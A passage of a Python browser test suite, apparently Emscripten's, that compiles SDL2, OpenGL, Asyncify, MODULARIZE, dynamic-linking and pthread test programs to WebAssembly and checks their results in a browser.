create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure=1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "ุณูุงู
" and "ุฌูุงู" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-s', 'ASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-s', 'ASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=[sync_tunnel]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl', 'test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), assert_returncode=3,
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# reffer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-gsource-map', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
